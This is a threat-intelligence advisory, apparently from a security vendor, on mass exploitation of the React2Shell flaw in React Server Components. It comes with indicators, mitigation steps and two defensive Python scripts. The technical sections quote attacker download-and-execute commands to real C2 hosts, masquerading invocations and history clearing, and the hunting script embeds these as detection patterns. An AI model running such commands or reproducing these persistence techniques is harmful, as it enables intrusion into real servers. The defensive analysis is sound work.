【CyCraft Monthly Intelligence】React2Shell Exploitation: Global Impact Analysis of Coordinated Attacks by Chinese Threat Actors

Threat and Impact

React2Shell (CVE-2025-55182) is a remote code execution (RCE) vulnerability in React Server Components (RSC). Its severity comes from its pre-authentication nature: an attacker needs only a single HTTP request to execute arbitrary code as the web server user. Because popular frameworks such as Next.js bundle the affected packages, the impact is widespread and the barrier to exploitation is extremely low. In many deployments, the mere presence of the vulnerable package is enough for the system to be compromised.

Analyst Perspective

React2Shell has enabled multiple threat groups to rapidly exploit the vulnerability on a global scale, targeting a vast number of React/Next.js workloads. The impact ranges from establishing stealthy persistence to causing substantial operational and financial consequences, particularly within cloud and VPS hosting environments.

Incident Description

Following the disclosure of the React2Shell vulnerability on December 3, 2025, widespread exploitation occurred within days. Google Threat Intelligence observed coordinated actions by multiple China-related threat actors, alongside attacks from financially motivated attackers and Iran-linked groups. The most active groups deployed a mix of tunnelers, backdoors, and miners:

  • UNC6600: uses the MINOCAT tunneler (with an embedded FRP client) to establish covert access channels and maintain long-term stealth.
  • UNC6586: deploys the SNOWLIGHT downloader (a VSHELL component) to fetch additional malicious payloads from external C2 servers.
  • UNC6588: uses the COMPOOD backdoor, disguised as a benign binary.
  • UNC6603: uses an updated version of the HISONIC backdoor, concealing configuration traffic within legitimate cloud services and primarily targeting AWS and Alibaba Cloud workloads in the APAC region.
  • UNC6595: uses ANGRYREBEL.LINUX, which masquerades as sshd and employs anti-forensic techniques on VPS infrastructure.

Reports also indicate that Earth Lamia (UNC5454) and Jackpot Panda have exploited this vulnerability, while other cybercrime syndicates have deployed XMRig miners on a massive scale.

Key Impacts:

  • Internet-facing React and Next.js applications are at risk, even if the vulnerable package exists only as transitive dependencies.
  • The effectiveness of edge/WAF protections at load balancers and entry points is being tested by the diversity of payload encodings in use.
  • Attackers frequently tamper with host persistence mechanisms (e.g., systemd services, cron jobs) and user shell initialization files (e.g., .bashrc) to maintain long-term access.
  • Once exploited, systems immediately initiate connections to retrieve malicious payloads and establish C2 channels; therefore, monitoring for anomalous outbound connections is critical.

Technical Details
Root cause
  • Vulnerability Type: Unauthenticated RCE in React Server Components (RSC).
  • Affected Packages/Versions: react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack versions 19.0, 19.1.0, 19.1.1, and 19.2.0.
  • Exploitation Features: A single HTTP request can trigger arbitrary code execution within the context of the web server process. Attackers can exploit this even if the vulnerable package exists only as transitive dependencies. Attackers employ various payload encoding methods, including in-memory Next.js Web Shells.

Reconnaissance

  • Internet-wide scanning to identify applications containing vulnerable RSC packages and exploitable Next.js endpoints.
  • Rapid fingerprinting from the initial foothold to identify the operating system, services, and privileges.
  • Basic reconnaissance to verify the actual privilege level and enumerate network interfaces, DNS settings, and potential sensitive credential stores.

Resource Development

  • Establish and reuse C2 infrastructure:
    • Use reactcdn.windowserrorapis[.]com to host SNOWLIGHT/VSHELL via HTTPS.
    • Host directly on 45.76.155[.]14 for COMPOOD (path /vim).
  • Abuse legitimate platforms for obfuscation:
    • HISONIC utilizes Cloudflare Pages and GitLab to host encrypted configuration files.
  • Packaging Attack Capability:
    • MINOCAT integrates a customized NSS wrapper and embeds an FRP (Fast Reverse Proxy) client.
  • Tool Exchange:
    • Share scanner/PoC code on underground forums.
    • Use GitHub to distribute miners and partial exploit code, mixed with fake or invalid repositories and samples targeting security researchers.

Initial Access

  • Vector: Send a single unauthenticated HTTP request to public-facing React/Next.js applications, exploiting CVE-2025-55182.
  • Outcome: Achieve code execution with the same privileges as the web server process, enabling the immediate execution of subsequent commands.

Execution

Common execution path: The web server process invokes curl or wget to retrieve bash scripts and ELF binaries, subsequently executing them.

  • Observed representative kill chains and commands:
    • MINOCAT (UNC6600): Bash installer creates $HOME/.systemd-utils, terminates the ntpclient process, downloads the MINOCAT ELF file, and executes it.
    • SNOWLIGHT/VSHELL (UNC6586): curl/wget retrieves a script that downloads and executes SNOWLIGHT. SNOWLIGHT then sends an HTTPS GET request to fetch staged payloads: curl -fsSL -m180 reactcdn.windowserrorapis[.]com:443/?h=reactcdn.windowserrorapis[.]com&p=443&t=tcp&a=l64&stage=true -o <filename>
    • COMPOOD (UNC6588): wget http://45.76.155[.]14/vim -O /tmp/vim, then masquerades as Vim while running with polkitd-like arguments: /tmp/vim "/usr/lib/polkit-1/polkitd --no-debug"
    • HISONIC (UNC6603): Deploy a Go-based backdoor, retrieving encrypted configurations from legitimate services.
    • ANGRYREBEL.LINUX (UNC6595): installed via b.sh, masquerading as sshd and executing from a non-standard location under /etc.
    • XMRig (financially-motivated): sex.sh pulls and launches the miner from GitHub, adding a systemd unit to maintain operation.

Persistence

  • Cron: Add scheduled tasks to automatically launch payloads (e.g., MINOCAT).
  • systemd: Create service units for automatic startup and service resilience (e.g., MINOCAT service, "system-update-service" used by XMRig).
  • Shell RC injection: Insert malicious command blocks into user shell configuration files (e.g., ~/.bashrc) to restart payloads upon new sessions.

Privilege Escalation

Service/Daemon abuse and masquerading:

  • Run malware as system services (systemd) or through similar mechanisms to inherit elevated privileges in misconfigured environments.
  • COMPOOD executes with parameters resembling polkitd; ANGRYREBEL.LINUX masquerades as sshd under /etc to blend in with privileged Daemons.

Defense Evasion

  • File and process masquerading:
    • MINOCAT creates hidden directories (e.g., $HOME/.systemd-utils)
    • COMPOOD is named and placed to resemble Vim; ANGRYREBEL.LINUX appears as sshd in non-standard paths.
  • Anti-forensics:
    • Timestomp (tampering with file timestamps) and clear shell history (history -c).
    • Terminate ntpclient to cover tracks or disrupt monitoring.
  • Traffic and configuration obfuscation:
    • HISONIC retrieves XOR-encoded configurations hosted on Cloudflare Pages/GitLab, delimited by specific markers (e.g., 115e1fc47977812...).
    • SNOWLIGHT retrieves staged payloads via HTTPS and masquerades as legitimate files.
  • Benign-appearing persistence mechanisms:
    • Use deceptive service names (e.g., "system-update-service" for cryptocurrency mining).

Lateral Movement

  • Reverse channels:
    • MINOCAT embeds an FRP client to establish a reverse tunnel back to attacker infrastructure, facilitating pivoting and access to internal assets.
  • Deploy backdoor for cross-host access:
    • SNOWLIGHT/VSHELL, COMPOOD, and HISONIC provide remote tasking and C2 callbacks.
    • ANGRYREBEL.LINUX masquerades as sshd, supporting stealthy cross-host SSH compromise.

Command and Control

  • HTTP(S)-based C2:
    • SNOWLIGHT/VSHELL sends GET requests with specific parameters to reactcdn.windowserrorapis[.]com:443 (e.g., t=tcp, a=l64, stage=true) to pull staged payloads.
  • Blend into cloud services:
    • HISONIC retrieves encrypted configurations from Cloudflare Pages and GitLab, making traffic appear benign.
  • Other backdoors:
    • COMPOOD possesses C2 capabilities (interactive shell, PTY, HTTP/TCP, SOCKS proxy), though subsequent C2 activities observed in some cases were limited.

Malware traits and notable indicators

  • MINOCAT
    • Category and technical traits: 64-bit Linux ELF; integrates a customized NSS wrapper and embeds an FRP client.
    • Persistence: cron, systemd, and .bashrc.
    • Communication and deployment: installer creates $HOME/.systemd-utils and terminates ntpclient.
  • SNOWLIGHT / VSHELL
    • Category and technical traits: Go-based backdoor loader.
    • Persistence: relies on scripts to repeatedly re-invoke execution.
    • Communication and deployment: retrieved through curl/wget; sends an HTTPS GET request to reactcdn.windowserrorapis[.]com with the parameters &t=tcp&a=l64&stage=true.
  • COMPOOD
    • Category and technical traits: Linux backdoor; functions include interactive shell, program management, PTY creation, HTTP/TCP communication, and SOCKS proxy.
    • Persistence: masquerades as system programs during execution.
    • Communication and deployment: downloaded to /tmp/vim and executed with polkitd-like arguments.
  • HISONIC
    • Category and technical traits: Go-based backdoor; configuration is encoded and delimited by specific markers.
    • Persistence: configuration is updated dynamically.
    • Communication and deployment: configuration hosted on legitimate cloud services such as Cloudflare Pages and GitLab.
  • ANGRYREBEL.LINUX
    • Category and technical traits: Linux malware with anti-detection features.
    • Persistence: masquerades as sshd in /etc.
    • Communication and deployment: installed through b.sh; performs timestomping and clears history records.
  • XMRig
    • Category and technical traits: cryptocurrency miner.
    • Persistence: "system-update-service" systemd unit.
    • Communication and deployment: retrieved from GitHub through sex.sh.

Impact

  • Resource hijacking: Deployment of XMRig via sex.sh for illicit cryptocurrency mining, maintained by a counterfeit systemd unit named system-update-service.
  • Service manipulation: Termination of the ntpclient process during the installation of MINOCAT.
  • Managerial impacts:
    • Widespread targeting and rapid weaponization: exploitation began almost immediately after disclosure, driven by both espionage and profit motives. Although some public PoC repositories were fake or booby-trapped, their circulation still accelerated exploitation and created additional hazards for researchers.
    • Concentrated risks in cloud and Internet-facing environments: We observed that Internet-facing React/Next.js applications are under the highest pressure, particularly cloud-hosted workloads (AWS, Alibaba Cloud) and international VPS environments. Containerized and self-hosted deployments containing vulnerable RSC packages are equally exposed.
  • Consequences:
    • Attackers gain stealthy access and C2 capabilities via tunnelers or backdoors (MINOCAT, HISONIC, COMPOOD, SNOWLIGHT), maintain persistence through cron/systemd and hijacked shell initialization files, and masquerade as system executables.
    • Service degradation caused by the miner (XMRig), potentially impacting performance and causing spikes in cloud costs.
    • Anti-forensics techniques such as clearing history and timestomping increase operational risk, making incident response and scoping significantly more difficult.
    • Although widespread data exfiltration has not yet been confirmed in current reports, persistent backdoor access means the potential for data theft and further intrusion remains significant.
  • Industry impact: Victims span across multiple sectors. Current telemetry and public reports indicate that finance, retail, logistics, IT/tech, education, and government sectors have all been affected. The attacks clearly focus on cloud-hosted web infrastructure rather than any specific vertical industry.
  • Victim footprint: The impact is universal but concentrated in APAC cloud environments. Historical tracking of certain payloads (e.g., COMPOOD) indicates footprints across Taiwan, Vietnam and China.
  • Strategic implications:
    • High severity and low barrier path: With a CVSS score of 10.0 (v3.x), attackers only need to send a single HTTP request to compromise a system. React2Shell has become a preferred initial access vector for both state-level actors and cybercriminals.
    • Expanded attack surfaces: Following CVE‑2025‑55182, React disclosed additional issues (CVE‑2025‑55183 Information Disclosure, CVE‑2025‑55184, and CVE‑2025‑67779 Denial of Service). This indicates a period of heightened scrutiny, and attackers will continue to pay close attention.
    • Supply chain and dependency blind spots: many organizations discover that vulnerable RSC packages are present only as transitive dependencies, leaving monorepos, containers, and CI/CD artifacts exposed without anyone noticing.

Conclusion

The disclosure of React2Shell has triggered a wave of follow-on vulnerability research, signalling a high-risk period for this technology. Even though the subsequent vulnerabilities are DoS or information-disclosure issues, affecting only availability or confidentiality, their presence calls for elevated scrutiny. Enterprises must adopt rapid, iterative patching to keep ahead of escalating operational risk.

Mitigation

Patch as the primary control

  • Immediately upgrade vulnerable RSC packages, including react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack versions 19.0, 19.1.0, 19.1.1, or 19.2.0.
  • Minimum fix for RCE: 19.0.1, 19.1.2, or 19.2.1; 19.2.2 and 19.2.3 also contain the RCE fix.
  • Subsequent patching:
    • CVE-2025-55183 (Info Disclosure): Version 19.2.2
    • CVE-2025-55184 & CVE-2025-67779 (DoS): Version 19.2.3 (DoS protection in 19.2.2 is incomplete).
  • Recommendation: Treat version 19.2.3 as the primary target for environment-wide deployment to resolve RCE and subsequent issues.
  • Scope and inventory: even if the relevant feature is not enabled, the mere presence of an affected RSC package constitutes exploitation risk. Audit every React/Next.js application and anything that bundles these packages, covering source repositories, containers, and running images.
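To make the inventory step concrete, the following script is an added example (not CyCraft's or the React project's code) that reads an npm package-lock.json (lockfileVersion 2 or 3) and flags every react-server-dom-* entry, direct or transitive, against the affected versions listed above. The sample lockfile is constructed, the version numbers of its non-RSC packages are placeholders, and the status labels are this example's own.

```python
"""Inventory React Server Components packages in an npm lockfile.

Added example, not CyCraft or React project code. Checks react-server-dom-*
entries against the versions the advisory lists for CVE-2025-55182.
"""
import json
import re

RSC_PACKAGES = {
    "react-server-dom-webpack",
    "react-server-dom-parcel",
    "react-server-dom-turbopack",
}
# Affected by CVE-2025-55182 per the advisory ("19.0" read as 19.0.0).
RCE_AFFECTED = {(19, 0, 0), (19, 1, 0), (19, 1, 1), (19, 2, 0)}
# The advisory's recommended environment-wide target (RCE plus follow-on CVEs).
RECOMMENDED = (19, 2, 3)

_VER = re.compile(r"^v?(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(text):
    """Return (major, minor, patch) or None; prerelease/build tags are ignored."""
    m = _VER.match(text.strip())
    return (int(m[1]), int(m[2]), int(m[3] or 0)) if m else None


def classify(version):
    """Status labels are this example's own, derived from the advisory's fix list."""
    v = parse_version(version)
    if v is None:
        return "unknown-version"
    if v in RCE_AFFECTED:
        return "RCE-vulnerable"
    if v[0] == 19 and v < RECOMMENDED:
        return "RCE-fixed-below-recommended"  # e.g. 19.0.1, 19.1.2, 19.2.1, 19.2.2
    return "ok"


def rsc_entries(lock):
    """Yield (path, name, version, transitive) from a lockfileVersion 2/3 'packages' map.

    'transitive' means the root project does not declare the package itself, which
    catches both nested copies (node_modules/next/node_modules/...) and hoisted ones.
    """
    packages = lock.get("packages", {})
    root = packages.get("", {})
    declared = set(root.get("dependencies", {})) | set(root.get("devDependencies", {}))
    for path, meta in packages.items():
        if not path:
            continue  # "" is the root project entry, not a package
        name = path.rsplit("node_modules/", 1)[-1]
        if name in RSC_PACKAGES:
            yield path, name, meta.get("version", ""), name not in declared


def audit(lock):
    """Return a finding for every RSC package whose status is not 'ok'."""
    findings = []
    for path, name, version, transitive in rsc_entries(lock):
        status = classify(version)
        if status != "ok":
            findings.append({"path": path, "name": name, "version": version,
                             "status": status, "transitive": transitive})
    return findings


def audit_file(lockfile_path):
    with open(lockfile_path, encoding="utf-8") as fh:
        return audit(json.load(fh))


# Constructed sample lockfile. Non-RSC version numbers are placeholders.
SAMPLE_LOCK = {
    "name": "example-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"next": "15.0.0", "react-server-dom-turbopack": "19.2.3"}},
        "node_modules/next": {"version": "15.0.0",
                              "dependencies": {"react-server-dom-webpack": "19.2.0"}},
        "node_modules/next/node_modules/react-server-dom-webpack": {"version": "19.2.0"},
        "node_modules/react-server-dom-parcel": {"version": "19.1.1"},  # hoisted transitive
        "node_modules/react-server-dom-turbopack": {"version": "19.2.3"},
        "node_modules/react": {"version": "19.2.0"},  # not an RSC package, not flagged
    },
}

if __name__ == "__main__":
    import sys
    lock = json.load(open(sys.argv[1], encoding="utf-8")) if len(sys.argv) > 1 else SAMPLE_LOCK
    for f in audit(lock):
        kind = "transitive" if f["transitive"] else "direct"
        print(f'{f["status"]:28} {f["name"]}@{f["version"]} ({kind}) at {f["path"]}')
```

Run it against each repository's lockfile and, for containers and running images, against the lockfile or node_modules tree extracted from the image; a "transitive" finding is exactly the blind spot the advisory warns about, because nothing in the root package.json will mention the package.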

Temporary virtual patching at the edge

  • Deploy WAF rules immediately to block React2Shell attack attempts. Enable these rules on Internet-facing load balancers while patching and verifying all instances.
  • Treat WAF as a temporary measure, not a substitute for patching, due to the diversity of payload formats and the rapid evolution of attack techniques.

Targeted detection, hunting, and containment

Given the prevalence of exploitation and the fact that post-compromise activities often begin within minutes, assume unpatched systems are compromised and hunt for the following:

  • Process and network indicators:
    • Web server processes spawning curl or wget to retrieve and execute payloads.
    • Outbound connections to observed C2/staging sites:
      • reactcdn.windowserrorapis[.]com with query patterns like &t=tcp&a=…&stage=true (SNOWLIGHT/VSHELL).
      • 45.76.155[.]14/vim (COMPOOD).
    • Signs of FRP-like tunneling behavior (MINOCAT) or implants pulling configurations (HISONIC) from Cloudflare Pages or GitLab.
  • Persistence and host changes
    • Creation of hidden directories: $HOME/.systemd-utils.
    • New or modified persistence mechanisms: cron entries, masquerading systemd services (e.g., "system-update-service" for XMRig, MINOCAT services), and command blocks injected into shell initialization files ($HOME/.bashrc and other rc files).
    • Anomalous process activity: Termination of ntpclient.
    • Masquerading or anti-forensics: Binaries in atypical paths (e.g., COMPOOD in /tmp/vim, fake sshd under /etc), timestomping, and clearing shell history (history -c).
  • Specific malware hunting
    • Scan disk and memory for MINOCAT, COMPOOD and SNOWLIGHT using published YARA rules and the IoCs listed below.
    • Search for HISONIC configuration markers: 115e1fc47977812 … 725166234cf88gxx.
  • Containment and eradication upon detection
    • Isolate the host, terminate malicious processes, remove malicious Cron entries and systemd units, restore shell initialization files, delete staged binaries and hidden directories, block observed C2 at the egress, rebuild systems from known good images, and rotate credentials on the host or used by the application.
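To show how the indicators above can be turned into a hunt, the following script is an added example (not CyCraft's or Google's code) that reads JSON-lines host telemetry in an assumed schema (process, network and file events with the fields shown) and applies the behaviours listed above: a web server process spawning curl/wget, contact with the listed C2/staging hosts or the SNOWLIGHT query pattern, the hidden MINOCAT directory, the COMPOOD and fake-sshd paths, the system-update-service unit, shell rc modification, ntpclient termination and history -c. The sample events are constructed; 203.0.113.10 in them is a documentation address, not an indicator.

```python
"""Hunt for React2Shell post-exploitation indicators in host telemetry.

Added example, not CyCraft or Google code. Event schema (assumed): one JSON
object per line with "type" in {"process", "network", "file"} and the fields
used below (parent_image, image, cmdline, dest, url, path, op).
"""
import json
import re
from urllib.parse import parse_qs, urlsplit

# IoCs quoted in the advisory, kept defanged here and refanged once at load.
DEFANGED_IOCS = {
    "reactcdn.windowserrorapis[.]com": "SNOWLIGHT/VSHELL C2 and staging",
    "82.163.22[.]139": "SNOWLIGHT C2",
    "216.158.232[.]43": "staging server for sex.sh (XMRig)",
    "45.76.155[.]14": "COMPOOD C2 and payload staging",
}
IOCS = {k.replace("[.]", "."): v for k, v in DEFANGED_IOCS.items()}

WEB_PROCS = {"node", "next-server", "next", "bun"}  # assumption: typical RSC hosts
FETCHERS = {"curl", "wget"}
KILLERS = {"kill", "pkill", "killall"}
FAKE_UNITS = {"system-update-service"}  # unit name used by the XMRig campaign
MASQUERADE_PATHS = [
    re.compile(r"^/tmp/vim$"),             # COMPOOD staged as "vim"
    re.compile(r"^/etc/.*sshd$"),          # ANGRYREBEL.LINUX: sshd living under /etc
    re.compile(r"/\.systemd-utils(/|$)"),  # MINOCAT installer directory
]
PERSISTENCE_DIRS = ("/etc/systemd/system/", "/etc/cron.d/", "/var/spool/cron/")
SHELL_RC = {".bashrc", ".bash_profile", ".profile", ".zshrc"}


def _base(path):
    return path.rsplit("/", 1)[-1]


def _hit(out, ev, rule, detail):
    out.append({"rule": rule, "detail": detail, "event": ev})


def check_process(ev, out):
    parent = _base(ev.get("parent_image", ""))
    image, cmd = ev.get("image", ""), ev.get("cmdline", "")
    if parent in WEB_PROCS and _base(image) in FETCHERS:
        _hit(out, ev, "web-proc-spawned-fetcher", f"{parent} -> {cmd}")
    if _base(image) in KILLERS and "ntpclient" in cmd:
        _hit(out, ev, "ntpclient-killed", cmd)
    if re.search(r"\bhistory\s+-c\b", cmd):
        _hit(out, ev, "shell-history-cleared", cmd)
    if any(p.search(image) for p in MASQUERADE_PATHS) or (
        image.startswith("/tmp/") and "polkitd" in cmd
    ):
        _hit(out, ev, "masquerading-binary", f"{image} {cmd}")


def check_network(ev, out):
    dest = ev.get("dest", "")
    if dest in IOCS:
        _hit(out, ev, "known-c2-or-staging", f"{dest}: {IOCS[dest]}")
    query = parse_qs(urlsplit(ev.get("url", "")).query)
    if query.get("stage") == ["true"] and query.get("t") == ["tcp"]:
        _hit(out, ev, "snowlight-staging-url", ev.get("url", ""))


def check_file(ev, out):
    path = ev.get("path", "")
    if any(p.search(path) for p in MASQUERADE_PATHS):
        _hit(out, ev, "suspicious-path", path)
    if path.startswith(PERSISTENCE_DIRS):
        name = _base(path).removesuffix(".service")
        tag = " [known fake unit name]" if name in FAKE_UNITS else ""
        _hit(out, ev, "new-persistence-artifact", path + tag)
    if ev.get("op") == "modify" and _base(path) in SHELL_RC:
        _hit(out, ev, "shell-rc-modified", path)


CHECKS = {"process": check_process, "network": check_network, "file": check_file}


def hunt(jsonl):
    """Run every check over JSON-lines telemetry and return the findings."""
    out = []
    for line in jsonl.splitlines():
        if line.strip():
            ev = json.loads(line)
            CHECKS.get(ev.get("type"), lambda e, o: None)(ev, out)
    return out


# Constructed sample telemetry; 203.0.113.10 is a documentation address, not an IoC.
SAMPLE_EVENTS = """\
{"type":"process","parent_image":"/usr/bin/node","image":"/usr/bin/curl","cmdline":"curl -fsSL http://203.0.113.10/b.sh -o /tmp/b.sh","user":"www-data"}
{"type":"network","image":"/usr/bin/curl","dest":"reactcdn.windowserrorapis.com","dport":443,"url":"https://reactcdn.windowserrorapis.com:443/?h=reactcdn.windowserrorapis.com&p=443&t=tcp&a=l64&stage=true"}
{"type":"process","parent_image":"/bin/bash","image":"/usr/bin/pkill","cmdline":"pkill ntpclient","user":"www-data"}
{"type":"file","op":"create","path":"/home/www-data/.systemd-utils/minocat"}
{"type":"process","parent_image":"/bin/bash","image":"/tmp/vim","cmdline":"/tmp/vim /usr/lib/polkit-1/polkitd --no-debug","user":"www-data"}
{"type":"file","op":"create","path":"/etc/systemd/system/system-update-service.service"}
{"type":"file","op":"modify","path":"/home/www-data/.bashrc"}
{"type":"process","parent_image":"/bin/bash","image":"/bin/bash","cmdline":"bash -c 'history -c'","user":"www-data"}
{"type":"process","parent_image":"/usr/bin/node","image":"/usr/bin/node","cmdline":"node server.js","user":"www-data"}
{"type":"network","image":"/usr/bin/node","dest":"api.example.com","dport":443,"url":"https://api.example.com/v1/health"}
"""

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_EVENTS
    for f in hunt(data):
        print(f'{f["rule"]:26} {f["detail"]}')
```

The two benign events at the end (the Node server itself and an ordinary API call) produce nothing, which is the point of keying the first rule on the parent/child pair rather than on curl alone. Adapting the script to real EDR or auditd output means mapping that source's field names onto the assumed schema; the rules themselves only need the parent image, the image, the command line, the destination and the file path.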

Strengthen exposure and blast-radius controls

  • Minimize outbound connections from application servers so that a single HTTP request cannot freely retrieve payloads or reach C2.
  • Enforce least-privilege egress rules and proxy allow-lists.
  • Run web services with non-privileged accounts, restrict write permissions to system directories and shell initialization files, and monitor execution from temporary or non-standard paths (e.g., anomalous binaries under /tmp or /etc).
  • Ensure logs for web access, process execution and outbound connections are retained and searchable to support rapid scoping.

Immediate action checklist

  • Immediately activate managed WAF rules.
  • Inventory and patch all affected applications to fixed versions; we recommend prioritizing an environment-wide upgrade to version 19.2.3.
  • Hunt for signs of compromise based on the indicators above; contain and eradicate if found.
  • Strengthen outbound and host hardening controls; ensure logging and alerting cover the described behaviors.


Reference

IoCs (Indicators of Compromise)

IP/Domain

  • reactcdn.windowserrorapis[.]com: SNOWLIGHT C2 and staging server
  • 82.163.22[.]139: SNOWLIGHT C2 server
  • 216.158.232[.]43: staging server for the sex.sh script
  • 45.76.155[.]14: COMPOOD C2 and payload staging server

Files

  • HISONIC sample
    • SHA256: df3f20a961d29eed46636783b71589c183675510737c984a11f78932b177b540
    • SHA1: 8bb6514ac3935479902820d0486df8b6abee73dd
    • MD5: 8a8951ffcbede6f4bedff6f3191179fd
  • HISONIC sample
    • SHA256: 92064e210b23cf5b94585d3722bf53373d54fb4114dca25c34e010d0c010edf3
    • SHA1: 972fe0233cea777f69ba5f081d60219eba73c617
    • MD5: 10231e4c2ade4f21c9d4fa52cabc8b5e
  • ANGRYREBEL.LINUX sample
    • SHA256: 0bc65a55a84d1b2e2a320d2b011186a14f9074d6d28ff9120cb24fcc03c3f696
    • SHA1: d97e8504b62caaea3611f423729ce88fc71b4f3d
    • MD5: e370c0a29ff9c917b63627e3f7b719d7
  • XMRig downloader script (filename: sex.sh)
    • SHA256: 13675cca4674a8f9a8fabe4f9df4ae0ae9ef11986dd1dcc6a896912c7d527274
    • SHA1: 7c8010d9ab6dfdc7a99aba7075a793260acbf2b8
    • MD5: 0ebc1aa375125e74354ef93eca1efbbe
  • SNOWLIGHT sample (filename: linux_amd64)
    • SHA256: 7f05bad031d22c2bb4352bf0b6b9ee2ca064a4c0e11a317e6fedc694de37737a
    • SHA1: 7ebb18d9a9cb71b24f301196c5cf61fb1ea0e68c
    • MD5: c3a836627fcafe73bde6c749188247cc
  • MINOCAT sample
    • SHA256: 776850a1e6d6915e9bf35aa83554616129acd94e3a3f6673bd6ddaec530f4273
    • SHA1: 1b5aba88ba7c4011d081b499ce6009df69e5dbcf
    • MD5: 533585eb6a8a4aad2ad09bbf272eb45b

About CyCraft

CyCraft is a cybersecurity company founded in 2017, focusing on autonomous AI technology. Headquartered in Taiwan, it has subsidiaries in Japan and Singapore. CyCraft provides professional cybersecurity services to government agencies, police and defense forces, banks, and high-tech manufacturers throughout the Asia-Pacific region. It has received strong backing from the CID Group and Pavilion Capital, a Temasek Holdings Private Limited subsidiary.
